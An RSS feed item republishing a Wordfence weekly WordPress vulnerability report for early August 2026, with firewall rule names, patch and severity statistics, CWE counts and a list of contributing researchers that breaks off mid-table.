<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Swift Website Updates &amp; Maintenance</title>
	<atom:link href="https://swiftupdates.ca/feed/" rel="self" type="application/rss+xml" />
	<link>https://swiftupdates.ca</link>
	<description>Swift Website Updates &#124; Wordpress Support</description>
	<lastBuildDate>Fri, 14 Aug 2026 15:38:41 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.4</generator>

<image>
	<url>https://swiftupdates.ca/wp-content/uploads/2022/11/Screen-Shot-2022-11-10-at-1.41.01-PM.png</url>
	<title>Swift Website Updates &amp; Maintenance</title>
	<link>https://swiftupdates.ca</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Wordfence Intelligence Weekly WordPress Vulnerability Report (August 3, 2026 to August 9, 2026)</title>
		<link>https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-august-3-2026-to-august-9-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Fri, 14 Aug 2026 15:38:41 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-august-3-2026-to-august-9-2026/</guid>

					<description><![CDATA[Last week, there were 249 vulnerabilities disclosed in 197 WordPress Plugins and 2 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 136 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our mission with [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Last week, there were 249 vulnerabilities disclosed in 197 WordPress Plugins and 2 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 136 Vulnerability Researchers that contributed to WordPress Security last week. <b>Review those vulnerabilities in this report now to ensure your site is not affected.</b></p>
<p>Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data<strong> to implement layered security, aligning with our overarching mission to secure WordPress with defense in depth strategies.</strong> That is why the Wordfence Intelligence <a href="https://www.wordfence.com/threat-intel/" target="_blank" rel="noopener">user interface</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability API</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a>, and <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> are all completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report. As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">world’s leading quality vulnerability database</a> provider for WordPress, site owners can rest assured knowing Wordfence has their back.</p>
<p>Enterprises, Hosting Providers, and even Individuals can use the <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> to run regular vulnerability scans across the sites they protect. Or alternatively, utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability Database API</a> to receive a complete dump of our <strong>database of over 35,000 vulnerabilities</strong> and then utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> to stay on top of the newest vulnerabilities added in real-time, as well as any updates made to the database, <strong>all for free</strong>.</p>
<p><em><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</em></p>
<hr>
<h3><a></a>New Firewall Rules Deployed Last Week</h3>
<p>The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.</p>
<p>The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers last week:</p>
<ul>
<li>WAF-RULE-940 – Data redacted while we work with the vendor on a patch.</li>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-702-unauthenticated-reflected-cross-site-scripting-via-log-parameter" target="_blank" rel="noopener">WordPress Core &lt;= 7.0.2 – Unauthenticated Reflected Cross-Site Scripting via log Parameter</a></li>
<li>emer-run.php Malware Auth Bypass</li>
</ul>
<p>Wordfence <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.</p>
<hr>
<h3>Total Unpatched &amp; Patched Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table patched-status">
<tr>
<th class="text-center w-50">Patch Status</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Patched</td>
<td class="total text-center">217</td>
</tr>
<tr>
<td class="text-center">Unpatched</td>
<td class="total text-center">32</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CVSS Severity Last Week</h3>
</p>
<table class="wfvr-list-table cvss-counts">
<tr>
<th class="text-center w-50">Severity Rating</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Medium Severity</td>
<td class="total text-center">174</td>
</tr>
<tr>
<td class="text-center">High Severity</td>
<td class="total text-center">62</td>
</tr>
<tr>
<td class="text-center">Critical Severity</td>
<td class="total text-center">13</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CWE Type Last Week</h3>
</p>
<table class="wfvr-list-table cwe-counts">
<tr>
<th class="text-center w-50">Vulnerability Type by CWE</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>Improper Neutralization of Input During Web Page Generation (&#8216;Cross-site Scripting&#8217;)</td>
<td class="total text-center">79</td>
</tr>
<tr>
<td>Missing Authorization</td>
<td class="total text-center">54</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)</td>
<td class="total text-center">31</td>
</tr>
<tr>
<td>Authorization Bypass Through User-Controlled Key</td>
<td class="total text-center">17</td>
</tr>
<tr>
<td>Exposure of Sensitive Information to an Unauthorized Actor</td>
<td class="total text-center">17</td>
</tr>
<tr>
<td>Improper Limitation of a Pathname to a Restricted Directory (&#8216;Path Traversal&#8217;)</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>Cross-Site Request Forgery (CSRF)</td>
<td class="total text-center">9</td>
</tr>
<tr>
<td>Server-Side Request Forgery (SSRF)</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>Improper Privilege Management</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Unrestricted Upload of File with Dangerous Type</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Deserialization of Untrusted Data</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Improper Control of Generation of Code (&#8216;Code Injection&#8217;)</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Authentication Bypass by Alternate Name</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Authentication Bypass Using an Alternate Path or Channel</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Embedded Malicious Code</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>External Control of Assumed-Immutable Web Parameter</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Control of Filename for Include/Require Statement in PHP Program (&#8216;PHP Remote File Inclusion&#8217;)</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Incorrect Authorization</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Incorrect Privilege Assignment</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Unverified Password Change</td>
<td class="total text-center">1</td>
</tr>
</table>
<hr>
<h3><a></a>Researchers That Contributed to WordPress Security Last Week</h3>
</p>
<table class="wfvr-list-table researcher-list">
<tr>
<th class="text-center w-50">Researcher Name</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a>
				</div>
</p></div>
</td>
<td class="total text-center">49</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a>
				</div>
</p></div>
</td>
<td class="total text-center">26</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a>
				</div>
</p></div>
</td>
<td class="total text-center">11</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01d45ecf2afce2efacfa60186c282224.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01d45ecf2afce2efacfa60186c282224"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener">Chawabhon Netisingha (JNX03)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/330e80e945f955de7587e8496f9e1cee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="330e80e945f955de7587e8496f9e1cee"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan (NomanProdhan)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/804a3b07eb5cd875d04cf09c04e08a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="804a3b07eb5cd875d04cf09c04e08a23"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener">Jakub Lipiński (A3RES)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e6fb44cd94cc5b5f1bb5c21077caa672.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e6fb44cd94cc5b5f1bb5c21077caa672"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/minar" target="_blank" rel="noopener">Minar</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4efd64e53b1a31312046abedbc413318.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4efd64e53b1a31312046abedbc413318"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener">Nox Axter</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f33b59d9d341b7f561c1e475646aaeb5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f33b59d9d341b7f561c1e475646aaeb5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener">Jonatan Buskila</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/343456e443c863409724aa97bcfa6e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="343456e443c863409724aa97bcfa6e3e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener">johska</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dd648f7d75a7e7a46d7d82c57b085613.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd648f7d75a7e7a46d7d82c57b085613"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener">Nhien Pham (nhienit)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c4c7257eabfabcbfa54be7eb5b7dd68c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4c7257eabfabcbfa54be7eb5b7dd68c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener">TurboNexic</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/64a0165f9a088bbcf2fc9efe7719419b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64a0165f9a088bbcf2fc9efe7719419b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener">bashu</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/808cc96dd7906a4eb995e7f5e1d17296.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="808cc96dd7906a4eb995e7f5e1d17296"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener">Chiao-Lin Yu (Steven Meow)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cf19879c40314b138910d3ea903fbba3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf19879c40314b138910d3ea903fbba3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jayant-kamble" target="_blank" rel="noopener">Jayant Kamble</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/aed2c19f017f6855244df6cf8d605335.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aed2c19f017f6855244df6cf8d605335"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-and-fran-ramirez" target="_blank" rel="noopener">Pablo González and Fran Ramírez</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/05c109de991b49e44631bb886e85be4f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="05c109de991b49e44631bb886e85be4f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anony-2" target="_blank" rel="noopener">maru</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d0f05e7e98f9171e2b5739505d09fdc3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d0f05e7e98f9171e2b5739505d09fdc3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/axbqd" target="_blank" rel="noopener">axbqd</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/028356566add2ba7dc84bb512e36fc3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="028356566add2ba7dc84bb512e36fc3e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lqc" target="_blank" rel="noopener">lqc</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/85f293dee3eecb01177cc42abdc331b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="85f293dee3eecb01177cc42abdc331b1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yong-jin-lim" target="_blank" rel="noopener">dyingman</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4240823195d4b265f3cd4ca5947a5e1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4240823195d4b265f3cd4ca5947a5e1c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener">Adam Rayyan Aryasatya</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/51a3cddbc5b4b4bda2364dff4f57dfed.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51a3cddbc5b4b4bda2364dff4f57dfed"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phyo-ko-ko" target="_blank" rel="noopener">Phyo Ko Ko</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cc05188d72326fd7f2aa86218d233560.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cc05188d72326fd7f2aa86218d233560"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/simon-tran" target="_blank" rel="noopener">Simon Tran</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/79c0b14658426052f872fd8e16ab8459.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79c0b14658426052f872fd8e16ab8459"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mokksh-parekh" target="_blank" rel="noopener">Mokksh Parekh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
